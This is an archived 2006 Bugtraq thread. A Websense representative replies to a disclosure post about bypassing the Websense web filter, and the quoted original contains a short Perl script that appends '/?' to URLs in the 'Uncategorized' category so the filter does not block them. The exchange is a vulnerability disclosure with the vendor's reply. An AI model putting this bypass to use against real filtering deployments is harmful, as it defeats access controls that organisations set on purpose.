[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [BULK] - Websense Filter Bypass
- To: <qex@xxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: RE: [BULK] - Websense Filter Bypass
- From: "Hubbard, Dan" <dhubbard@xxxxxxxxxxxx>
- Date: Fri, 21 Apr 2006 10:11:42 -0700
All;
We have received this report and are investigating. Our preliminary
tests show that this only works when customers block the uncategorized
URL category and allow the dynamic content category.
If you do not block uncategorized you should not be affected.
-----Original Message-----
From: qex@xxxxxxxxxxx [mailto:qex@xxxxxxxxxxx]
Sent: Thursday, April 20, 2006 5:04 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [BULK] - Websense Filter Bypass
#!/usr/bin/perl -w
#
# Websense Filter Bypass
#
# ====================
# Discovered by: Qex
# Date: 19 April 2006
# ====================
#
# Bypass any website that is in the "Uncategorized" Websense Category #
simply by adding a question mark (?) at the end of the URL.
print q(
Websense Filter Bypass
====================
Discovered by: Qex
Date: 19 April 2006
====================
)
print "Enter URL:\n";
$url = <STDIN>;
chomp $url;
$bypass = "$url/?";
print "\nURL: \n$bypass\n";